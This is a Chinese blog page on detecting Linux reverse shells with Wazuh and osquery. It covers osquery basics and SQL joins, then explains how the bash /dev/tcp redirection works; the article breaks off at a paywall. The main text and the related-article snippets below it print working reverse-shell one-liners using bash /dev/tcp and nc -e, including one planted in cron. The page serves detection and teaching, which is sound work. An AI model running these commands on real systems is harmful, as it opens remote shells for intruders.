linux反弹shell检测和溯源,Wazuh联动osquery检测linux反弹shell

最新推荐文章于 2024-06-20 20:00:00 发布
最新推荐文章于 2024-06-20 20:00:00 发布
阅读量1.1k 收藏 1
点赞数
文章标签: linux反弹shell检测和溯源

用osquery根据制定的规则定时检测系统并生成包含查询结果的日志文件,wazuh再对这些日志文件进行解析之后匹配规则告警。

osquery

下载安装的过程就略过了。这里简单介绍下osquery,详细请参考官方文档

文件结构

/etc/osquery/

/usr/share/osquery/osquery.example.conf

/usr/share/osquery/lenses/{*}.aug

/usr/share/osquery/packs/{*}.conf

/var/log/osquery/

/usr/lib/osquery/

/usr/bin/osqueryctl

/usr/bin/osqueryd

/usr/bin/osqueryi

osqueryi

一个修改的后的sqliteshell,可以执行查询语句

.tables,所有表

.schema,显示表结构

pragma table_info(table_name),可视化显示表结构

osqueryd

守护进程,用来定时查询并记录操作系统的更改。

SQL查询

只支持select语句,实际上经常用到多表连接查询join,连接运算是从两个关系的笛卡尔积中选择属性间满足一定条件的元组。

普通join,也是inner join,返回两个表中同时满足条件的元组对,不满足的将被丢弃。

a join b using (id),后面接a,b两张表中都存在的字段 (字段名称一样都是id,而且必须相等)

a JOIN b ON (a.id = b.id),后面接a,b两张表中需要关联的字段 (字段名称不需要一样 a.aid = b.bid,可以指定任意的连接条件(=,>=,<=,!=,>,<...>

LEFT OUTER JOIN,返回左表所有行以及右表满足条件的行,左表有值右表无值填充为null

RIGHT OUTER JOIN,返回右表所有行以及左表满足条件的行,右表有值左表无值填充为null

FULL OUTER JOIN,返回所有表的所有行,在满足条件的行之外,左表满足右表不满足或者相反,均填充null

SELF JOIN,相当于A JOIN A

命令行参数选项

因为可选参数太多,所以放在一个文件里面,--flagfile /etc/osquery/osquery.flags

配置文件

Windows: C:\ProgramData\osquery\osquery.conf

Linux: /etc/osquery/osquery.conf and /etc/osquery/osquery.conf.d/

MacOS: /var/osquery/osquery.conf and /var/osquery/osquery.conf.d/

反弹shell

市面上最常见的bash反弹为例:bash -i >& /dev/tcp/192.168.1.1/8888 0>&1

>&和&>都是表示的是把标准输出1和标准错误2同时重定向到某个文件,相当于>word 2>&1

bash -i >& /dev/tcp/192.168.1.1/8888 等价于

bash -i >/dev/tcp/192.168.1.1/8888 2>&1

bash -i > /dev/tcp/192.168.1.1/8888 0>&1,将bash -i的标准输出1重定向到远端,0>&1代表标准输入0也复制到标准输出1,并且不能简写为>&1,反而0

标准错误2有回显输入命令和终端提示符的作用。

除此之外,还有

nc 192

最低0.47元/天 解锁文章
weixin_39820136
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
网络安全-反弹shell详解(攻击,检测与防御)
2401_84466336的博客
04-23 3581
1.1 什么是 ShellShell 在计算机系统中指的是一个用户界面,用于访问操作系统的服务。在网络安全中,攻击者常利用 Shell 来控制受害者的系统。1.2 反弹 Shell 的工作原理反弹 Shell 的基本原理是:攻击者在其自己的机器上设置监听端口,然后诱使受害者的机器执行一个反向连接的 Shell 命令,连接回攻击者的机器。这样,攻击者就能通过这个反向连接执行命令,控制受害者的计算机。
linux服务器告警反弹shell行为
lanren312的博客
05-20 458
检测说明:进程sh的启动参数为 /bin/sh -c bash -i>& /dev/tcp/服务器iP/端口 0>&1,符合可疑进程参数的特性.发现有记录 * * * * * bash -i >& /dev/tcp/服务器iP/端口 0>&1。客户今天持续收到服务器告警,给出了可以参数信息。告警说明:Linux反弹shell行为。再去看cron日志,果然一分钟一次。果断将里面的内容清空,到此告警消失。
Wazuh和Nmap集成扫描内网中开放端口和服务
最新发布
2401_85027424的博客
06-20 983
本篇文章将介绍利用Wazuh和Nmap集成,扫描内网中开放端口和服务。此处我们将使用**(https://pypi.org/project/python-nmap/)**来扫描不同子网的开放端口/服务。,其输出被转换为JSON,并添加到每个agent的中。然后扫描通过cron安排作业,每周、每月等执行一次,这里也可以通过Wazuh的集成来触发。
hids wazuh 系列4-反弹shell规则
煜铭2011
01-19 2057
传统的入侵检测,主要分为网络入侵检测系统和主机入侵检测系统,分别作用于网络层面和主机(服务器、办公电脑等终端)。随着技术发展,出现了结合传统入侵检测系统和新技术(如数据分析、威胁情报、自动化操作、主动响应等)的新产品,这类新产品可能的名称是XDR、EDR、EPP等。Wazuh 是 以OSSEC作为引擎的基于主机的入侵检测系统,用于主机端点和云工作负载的统一XDR和SIEM保护。
Wazuh检测反弹shell
gehongzhou的专栏
11-18 1892
Wazuh通过在agent服务器上执行指定的命令,并收集命令结果,可以在一定程度上发现反弹shell的入侵行为。 目前有2中常见的检测方法,一种是通过netstat输出网络连接中的shell进程来识别,另一种是通过ps输出进程信息中的反弹shell命令特征来识别。 1. 在agent的/var/ossec/etc/ossec.conf文件末尾增加自定义的命令,并重启 <ossec_c...
linux检测反弹shell
weixin_43781139的博客
02-25 2279
1、bash -i >& /dev/tcp/192.168.110.78/6767 0>&1 可以看到bash -i的输入输出和错误输出全部定位到了一个socket上 我们lsof看一下bash进程 我们可以看到bash远程指向一个ip,那我们完全可以判定这是一个反弹shell。 2、nc -e /usr/bin/bash 192.168.110.78 6767 这里我们看到bash的输入输出都定位到了管道上,而这个管道指向父进程nc,而且这两个...
Linux系统反弹shell总结
Bird&Bird
06-07 1334
目录前言正向连接反向连接利用netcat反弹shell利用Bash反弹shellCurl配合Bash反弹shell反弹shell的命令写入定时任务将反弹shell的命令写入/etc/profile文件利用Socat反弹shell利用Telnet反弹shell方法一方法二各种脚本反弹shellPython 脚本反弹shellphp 脚本反弹shellPerl 脚本反弹shellRuby脚本反弹shell使用Metasploit生成反弹shell用的一句话反弹shell后获取模拟终端使用OpenSSL反弹加密
linux+反弹shell原理,linux反弹shell的原理详解
weixin_36163504的博客
05-13 287
完整命令反弹shell命令:bash -i >& /dev/tcp/10.0.0.1/8080 0>&1bash -i > /dev/tcp/ip/port 0>&1 2>&1利用nc反弹shell:nc -lvvp 12345 -t -e /bin/bash原理bash -i > /dev/tcp/ip/port 0>&a...
Linux下NC反弹shell命令(推荐)
09-15
在网络安全和渗透测试中,反弹Shell是一种常见的技术,它允许攻击者远程控制受感染的系统。在Linux环境中,网络工具`nc`(Netcat)常被用来创建这种连接。本篇文章将详细介绍如何在Linux下使用`nc`进行反弹Shell操作...
linux反弹shell的原理详解
01-08
反弹shell命令: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 bash -i > /dev/tcp/ip/port 0>&1 2>&1 利用nc反弹shell: nc -lvvp 12345 -t -e /bin/bash 原理 bash -i > /dev/tcp/ip/port 0>&1 2>&1 bash -i 打开一...
不一样的视角剖析Linux 反弹shell水印版.pdf
08-02
【不一样的视角剖析Linux 反弹shell】这篇文档深入探讨了Linux环境下反弹shell的详细知识,作者从独特的角度出发,挑战了传统的分类方法,为读者提供了更细致的理解。反弹shell是渗透测试中的关键技术,它涉及被控端...
C语言+shell实现linux网卡状态检测
08-27
本文主要介绍了使用C语言和shell实现Linux网卡状态检测的方法,包括检测网卡的存在、状态和链接情况。下面是对该方法的详细解释: 一、基本原理 网卡状态检测是通过使用ifconfig命令和grep命令来实现的。ifconfig...
Linux反弹Shell检出原理篇
SHELLCODE_8BIT的博客
03-24 3093
1.理解什么是tty,pty,pts tty是终端,pty为终端,pts是pty实现,参考下文 Linux下的tty和pts详解_大蓝的信安日记的博客-CSDN博客 2.了解基本反弹shell原理是stdin stdout stderr重定向 0 标准输入 1 标准输入 2 标准错误 https://xz.aliyun.com/t/2548 3.反弹shell有各种类型,然后不同类型有不同特诊,将其分类并且检出 bash反弹shell攻击检测 - micr067 - 博客园 ...
反弹shell原理与检测思路
weixin_45690589的博客
02-26 620
反弹shell的本质可以定义为:一个client上的bash进程 可以和 server上的进程通信。本质上就是检测 shell进程(如bash)的输入输出是否来自于一个远程的server。由于进程通信的复杂性(例如pipe),会导致单纯的检测shell进程的0 1 2 是否来自socket会存在漏报。但是按照这个思路,检测shell进程的0 1 2 的来源,顺着来源继续跟踪,如果最终是来自一个socket。那么则存在反弹shell的风险。
linux 渗透 反弹shell,【技术分享】Linux渗透之反弹Shell命令解析
weixin_26814683的博客
05-13 247
前言当我们在渗透Linux主机时,反弹一个交互的shell是非常有必要的。在搜索引擎上搜索关键字“Linux 反弹shell”,会出现一大堆相关文章,但是其内容不但雷同,而且都仅仅是告诉我们执行这个命令就可以反弹shell了,却没有一篇文章介绍这些命令究竟是如何实现反弹shell的。既然大牛们懒得科普,那我就只好自己动手了。本文就来探讨一下相关命令实现的原理。Bash这篇文章的起因就是网上给的Ba...
Wazuh从入门到上线
ordersyhack
02-02 1万+
Wazuh从入门到上线
Wazuh--一个完善的开源EDR产品
网络安全研究
09-11 9980
1. 简介 Wazuh由部署到受监视系统的端点安全代理和管理服务器组成,管理服务器收集和分析代理收集的数据。此外,Wazuh已与Elastic Stack完全集成,提供了搜索引擎和数据可视化工具,使用户可以浏览其安全警报。 Wazuh提供的功能包括日志数据分析,入侵和恶意软件检测,文件完整性监视,配置评估,漏洞检测以及对法规遵从性的支持。 github: https://github.com/wazuh 2. Wazuh平台的组件和体系结构 Wazuh平台主要包括三个主要组件,分别是Wazuh代理,Wazu
wazuh 日志收集原理分析
热门推荐
guoguangwu的专栏
11-05 1万+
wazuh 默认安装到 /var/ossec目录下。 我基于manager端进行分析,和agent一样。默认启动ossec-logcollector进程去搜集日志:比如 snort日志、auditd日志、syslog日志等。 入口函数代码在src/logcollector/main.c中。 int main(int argc, char **argv) { /* 初始化处理: 命...
linux反弹shell检测
08-22
Linux 反弹 shell 是一种攻击技术,攻击者利用漏洞或恶意代码将远程 shell 注入受害者的系统,从而获取对系统的控制权。为了检测 Linux 反弹 shell,可以采取以下几种方法: 1. 监控网络活动:使用网络监控工具,如 tcpdump 或 Wireshark,检查网络流量是否存在异常连接或未知的传出连接。特别关注与反弹 shell 相关的常见端口(如 4444、31337)。 2. 检查系统进程:使用 ps 或 top 命令检查正在运行的进程列表,查找不明确的、不信任的或异常的进程。特别关注与反弹 shell 相关的常见进程名称(如 netcat、nc、socat)。 3. 检查系统文件:使用查找命令(如 find)或相关工具,检查系统文件是否存在未知的、可疑的或异常的文件。特别关注与反弹 shell 相关的常见文件名和路径(如 .bashrc、.bash_profile、.ssh/authorized_keys)。 4. 检查系统日志:查看系统日志文件,如 /var/log/auth.log 或 /var/log/secure,检查是否存在异常登录尝试或认证失败记录,以及与反弹 shell 相关的异常日志。 5. 使用专业工具:使用专门的安全工具,如 LOKI、Lynis、AIDE 等,来扫描系统并检测可能的反弹 shell 活动。这些工具可以自动化检测系统中的恶意活动和异常行为。 请注意,这些方法可以帮助您发现潜在的反弹 shell 活动,但不能保证绝对的安全。建议您定期更新系统、安装最新的安全补丁,并采取其他安全措施来确保系统的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值